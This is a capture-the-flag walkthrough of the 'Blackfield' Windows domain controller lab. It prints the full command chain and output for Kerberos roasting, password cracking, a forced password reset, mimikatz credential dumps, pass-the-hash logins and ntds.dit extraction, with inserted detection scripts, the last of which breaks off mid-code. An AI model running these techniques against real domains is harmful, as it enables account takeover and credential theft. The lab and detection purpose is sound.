Blackfield

Nmap

nmap -sC -sV -T5 -p- 10.10.10.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 12:12 BST
Stats: 0:03:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 59.83% done; ETC: 12:17 (0:02:00 remaining)
Stats: 0:06:04 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 87.50% done; ETC: 12:19 (0:00:18 remaining)
Nmap scan report for 10.10.10.192
Host is up, received echo-reply ttl 127 (0.10s latency).
Not shown: 65527 filtered ports
Reason: 65527 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain?       syn-ack ttl 127
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-06-09 18:20:34Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/9%Time=5EDF6F9F%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h03m51s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-09T18:22:54
|_  start_date: N/A

User

smbclient -L //10.10.10.192

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	forensic        Disk      Forensic / Audit share.
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	profiles$       Disk      
	SYSVOL          Disk      Logon server share 

I have access to /profiles$, which consists of many directories whose names look like usernames.

smbclient //10.10.10.192/profiles$

AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz
AMaceldon
AMasalunga
ANavay
ANesterova
ANeusse
AOkleshen
APustulka
ARotella
ASanwardeker
AShadaia
ASischo
ASpruce
ATakach
ATaueg
ATwardowski
audit2020
AWangenheim
AWorsey
AZigmunt
BBakajza
BBeloucif
BCarmitcheal
BConsultant
BErdossy
BGeminski
BLostal
BMannise
BNovrotsky
BRigiero
BSamkoses
BZandonella
CAcherman
CAkbari
CAldhowaihi
CArgyropolous
CDufrasne
CGronk
Chiucarello
Chiuccariello
CHoytal
CKijauskas
CKolbo
CMakutenas
CMorcillo
CSchandall
CSelters
CTolmie
DCecere
DChintalapalli
DCwilich
DGarbatiuc
DKemesies
DMatuka
DMedeme
DMeherek
DMetych
DPaskalev
DPriporov
DRusanovskaya
DVellela
DVogleson
DZwinak
EBoley
EEulau
EFeatherling
EFrixione
EJenorik
EKmilanovic
ElKatkowsky
EmaCaratenuto
EPalislamovic
EPryar
ESachhitello
ESariotti
ETurgano
EWojtila
FAlirezai
FBaldwind
FBroj
FDeblaquire
FDegeorgio
FianLaginja
FLasokowski
FPflum
FReffey
GaBelithe
Gareld
GBatowski
GForshalger
GGomane
GHisek
GMaroufkhani
GMerewether
GQuinniey
GRoswurm
GWiegard
HBlaziewske
HColantino
HConforto
HCunnally
HGougen
HKostova
IChristijr
IKoledo
IKotecky
ISantosi
JAngvall
JBehmoiras
JDanten
JDjouka
JKondziola
JLeytushsenior
JLuthner
JMoorehendrickson
JPistachio
JScima
JSebaali
JShoenherr
JShuselvt
KAmavisca
KAtolikian
KBrokinn
KCockeril
KColtart
KCyster
KDorney
KKoesno
KLangfur
KMahalik
KMasloch
KMibach
KParvankova
KPregnolato
KRasmor
KShievitz
KSojdelius
KTambourgi
KVlahopoulos
KZyballa
LBajewsky
LBaligand
LBarhamand
LBirer
LBobelis
LChippel
LChoffin
LCominelli
LDruge
LEzepek
LHyungkim
LKarabag
LKirousis
LKnade
LKrioua
LLefebvre
LLoeradeavilez
LMichoud
LTindall
LYturbe
MArcynski
MAthilakshmi
MAttravanam
MBrambini
MHatziantoniou
MHoerauf
MKermarrec
MKillberg
MLapesh
MMakhsous
MMerezio
MNaciri
MShanmugarajah
MSichkar
MTemko
MTipirneni
MTonuri
MVanarsdel
NBellibas
NDikoka
NGenevro
NGoddanti
NMrdirk
NPulido
NRonges
NSchepkie
NVanpraet
OBelghazi
OBushey
OHardybala
OLunas
ORbabka
PBourrat
PBozzelle
PBranti
PCapperella
PCurtz
PDoreste
PGegnas
PMasulla
PMendlinger
PParakat
PProvencer
PTesik
PVinkovich
PVirding
PWeinkaus
RBaliukonis
RBochare
RKrnjaic
RNemnich
RPoretsky
RStuehringer
RSzewczuga
RVallandas
RWeatherl
RWissor
SAbdulagatov
SAjowi
SAlguwaihes
SBonaparte
SBouzane
SChatin
SDellabitta
SDhodapkar
SEulert
SFadrigalan
SGolds
SGrifasi
SGtlinas
SHauht
SHederian
SHelregel
SKrulig
SLewrie
SMaskil
Smocker
SMoyta
SRaustiala
SReppond
SSicliano
SSilex
SSolsbak
STousignaut
support
svc_backup
SWhyte
SWynigear
TAwaysheh
TBadenbach
TCaffo
TCassalom
TEiselt
TFerencdo
TGaleazza
TKauten
TKnupke
TLintlop
TMusselli
TOust
TSlupka
TStausland
TZumpella
UCrofskey
UMarylebone
UPyrke
VBublavy
VButziger
VFuscca
VLitschauer
VMamchuk
VMarija
VOlaosun
VPapalouca
WSaldat
WVerzhbytska
WZelazny
XBemelen
XDadant
XDebes
XKonegni
XRykiel
YBleasdale
YHuftalin
YKivlen
YKozlicki
YNyirenda
YPredestin
YSeturino
YSkoropada
YVonebers
YZarpentine
ZAlatti
ZKrenselewski
ZMalaab
ZMiick
ZScozzari
ZTimofeeff
ZWausik

python2 /opt/impacket/kerbrute/kerbrute.py -domain blackfield.local -users users.txt -passwords /usr/share/wordlists/rockyou.txt -outputfile passwords.txt -dc-ip 10.10.10.192
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Valid user => audit2020
[*] Valid user => support [NOT PREAUTH]
[*] Valid user => svc_backup
python3 /opt/impacket/examples/GetNPUsers.py blackfield.local/ -usersfile users_filtered.txt -dc-ip 10.10.10.192 -format hashcat -outputfile hashes.txt

$krb5asrep$23$support@BLACKFIELD.LOCAL:8f7f4c2310face41072792a84f5cde3c$db4be3c61ca74174fd053b05f6f465feb1df645123441890930c84889b35924056c4fc0ddb6a6cd5f6ad92ce52f49cdcfd16f04d103d920c980a4f14fa92432e6883f5a8d095a97ca0a3af92f3f969a74a70d8bb53f223c499ef09b889e52ebcfe251085ddf0c43f6e954e058a7bd9a2827a0045a497bd4c1a491d1ec203efefac048424d29ee8477d204bf13d5c07bf8753aaa2070d5b16802e03ea85eb991c7a70ce28529ee4ac3dfbc0214047c3f592c741f063ad029fdab6d252926599152167f811d99ada5bb330915638001a437f824db037ada6c10469a5d8a116ded12cb04114183d53b3b1b41e042dcf671763fedf66

I managed to extract the users and a hash, which I then feed into hashcat

hashcat -m 18200 -D 1 -a 0 -n 10 hashes.txt /usr/share/wordlists/rockyou.txt -o support_password --force
support : #00^BlackKnight
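The defender's side of the two Kerberos steps above (kerbrute user enumeration and the AS-REP roast of support). This is an added example, not part of the original writeup; the Security event 4768 records are constructed sample lines, and 10.10.14.5 is an assumed probing host.

```python
"""Flag Kerberos user enumeration and AS-REP roasting in Security event 4768
(TGT requested) records. The sample events are constructed for this example,
written as key=value lines rather than raw EVTX."""
from collections import defaultdict

# Constructed sample. Status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (no such
# user), 0x0 = ticket issued. PreAuthType 0 = no pre-authentication,
# 2 = PA-ENC-TIMESTAMP. TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256.
# 10.10.14.5 is a constructed probing host; 10.10.10.192 is the DC itself.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=AAlleni IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=ABarteski IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=ABekesz IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=ABenzies IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=ABiemiller IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=support IpAddress=::ffff:10.10.14.5 Status=0x0 PreAuthType=0 TicketEncryptionType=0x17
EventID=4768 TargetUserName=svc_backup IpAddress=::ffff:10.10.10.192 Status=0x0 PreAuthType=2 TicketEncryptionType=0x12
EventID=4768 TargetUserName=Administrator IpAddress=::ffff:10.10.10.192 Status=0x0 PreAuthType=2 TicketEncryptionType=0x12
EventID=4768 TargetUserName=jdoe IpAddress=::ffff:10.10.10.50 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
EventID=4672 SubjectUserName=Administrator IpAddress=-
"""

def parse_4768(text):
    """Turn 'key=value key=value' lines into dicts, keeping only event 4768."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        if fields.get("EventID") == "4768":
            events.append(fields)
    return events

def detect_asrep_roast(events):
    """A TGT issued with no pre-authentication and an RC4 (0x17) ticket is the
    AS-REP roast signature: the requester never proved the password, yet
    received material that can be cracked offline (what hashcat -m 18200
    consumes). Enforcing pre-auth and AES removes both conditions."""
    return sorted({e["TargetUserName"] for e in events
                   if e["Status"] == "0x0"
                   and e["PreAuthType"] == "0"
                   and e["TicketEncryptionType"] == "0x17"})

def detect_user_enum(events, min_unknown=3):
    """Kerbrute-style enumeration: one source address collects 0x6 failures
    for many distinct names (a typo produces one, not dozens). Returns
    {source_ip: number of distinct unknown names} at or above the threshold."""
    unknown = defaultdict(set)
    for e in events:
        if e["Status"] == "0x6":
            unknown[e["IpAddress"].replace("::ffff:", "")].add(e["TargetUserName"])
    return {ip: len(names) for ip, names in unknown.items()
            if len(names) >= min_unknown}

if __name__ == "__main__":
    evs = parse_4768(SAMPLE_4768)
    print("AS-REP roasted accounts:", detect_asrep_roast(evs))
    print("enumeration sources:", detect_user_enum(evs))
```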

With a user and password I can search LDAP

ldapsearch -x -h 10.10.10.192 -D 'support@blackfield.local' -w '#00^BlackKnight' -s sub -b 'DC=BLACKFIELD,DC=local'

There are a lot of results, so I used ldapdomaindump

ldapdomaindump -u "BLACKFIELD\support" -p "#00^BlackKnight" --no-json --no-grep 10.10.10.192 

We enumerate further

bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d BLACKFIELD.LOCAL -dc DC01.BLACKFIELD.LOCAL -gc DC01.BLACKFIELD.LOCAL --dns-tcp

We can reset the audit2020 user's password

rpcclient -U support //10.10.10.192
setuserinfo2 audit2020 23 'Password123'

We have access to the SMB share /forensic

smbclient //10.10.10.192/forensic -U audit2020%Password123

  .                                   D        0  Sun Feb 23 13:03:16 2020
  ..                                  D        0  Sun Feb 23 13:03:16 2020
  commands_output                     D        0  Sun Feb 23 18:14:37 2020
  memory_analysis                     D        0  Thu May 28 21:28:33 2020
  tools                               D        0  Sun Feb 23 13:39:08 2020

The files in the memory_analysis folder are too big, so I download them with smbget

smbget -R smb://10.10.10.192/forensic/memory_analysis -U audit2020%Password123

Next I dump the hashes with mimikatz

sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords

Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23.02.2020 20:00:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 365835 (00000000:0005950b)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 365493 (00000000:000593b5)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23.02.2020 19:59:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
tspkg :
wdigest :
* Username : Administrator
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 40310 (00000000:00009d76)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 40232 (00000000:00009d28)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DC01$
Domain : BLACKFIELD
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : dc01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 24410 (00000000:00005f5a)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 406499 (00000000:000633e3)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23.02.2020 20:00:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 366665 (00000000:00059849)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 366649 (00000000:00059839)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 23.02.2020 19:57:47
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 24405 (00000000:00005f55)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 24294 (00000000:00005ee6)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 24282 (00000000:00005eda)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 22028 (00000000:0000560c)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 23.02.2020 19:57:44
SID :
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DC01$
Domain : BLACKFIELD
Logon Server : (null)
Logon Time : 23.02.2020 19:57:44
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : dc01$
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :

Among the useful things we find a working hash for the svc_backup user

evil-winrm.rb -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
*Evil-WinRM* PS C:\Users\svc_backup\desktop> cat user.txt
6df032cc9****33a79a48f85

Root

*Evil-WinRM* PS C:\Users\svc_backup\desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

This user has a lot of privileges and SeBackupPrivilege could be used, but something doesn't work, probably because of EFS.
I found a few options, so let's go through them one by one…


*Evil-WinRM* PS C:\tmp> reg.exe save hklm\system C:\tmp\system
*Evil-WinRM* PS C:\tmp> download system

Next we upload the file and create a shadow copy. The script "mounts" drive C as drive T with different permissions

upload skrypt.txt
diskshadow /s skrypt.txt

diskshadow script file
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias Systemvolumeshadow
create
expose %Systemvolumeshadow% t:
expose %Datavolumeshadow% q:
exec c:\temp\cmd.cmd
end backup
End of script

Note: %Datavolumeshadow% and c:\temp\cmd.cmd are not defined anywhere in this script; only the t: exposure of the C: shadow copy is needed for the steps below.

We upload the libraries via WinRM and then use them following the instructions on GitHub (link below)

upload SeBackupPrivilegeCmdLets.dll
upload SeBackupPrivilegeUtils.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Get-SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege

cd T:\windows\ntds
Copy-FileSeBackupPrivilege ntds.dit C:\Windows\system32\spool\drivers\color\ntds.dit -Overwrite
cd C:\Windows\system32\spool\drivers\color\
download ntds.dit

We can use impacket to extract the hashes

impacket-secretsdump -system system -ntds ntds.dit local
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
.....
evil-winrm.rb -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
41383e13c077b67****110b545f62f
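The same privilege-escalation chain seen from the detection side: reg.exe hive export, diskshadow in script mode and an ntds.dit copy all land in Security event 4688 when command-line auditing is on. This is an added example, not part of the original writeup; the 4688 lines are constructed, and jdoe is an assumed benign account.

```python
"""Detect the Backup Operators -> hive export -> diskshadow -> ntds.dit copy
chain in Security event 4688 (process creation) records. All sample lines
are constructed for this example and assume command-line auditing."""
import re
from collections import defaultdict

# Constructed sample: the three commands from the walkthrough run as
# svc_backup, plus benign reg/diskshadow use that must not fire.
SAMPLE_4688 = r"""
EventID=4688 SubjectUserName=svc_backup NewProcessName=C:\Windows\System32\reg.exe CommandLine="reg.exe save hklm\system C:\tmp\system"
EventID=4688 SubjectUserName=svc_backup NewProcessName=C:\Windows\System32\diskshadow.exe CommandLine="diskshadow /s skrypt.txt"
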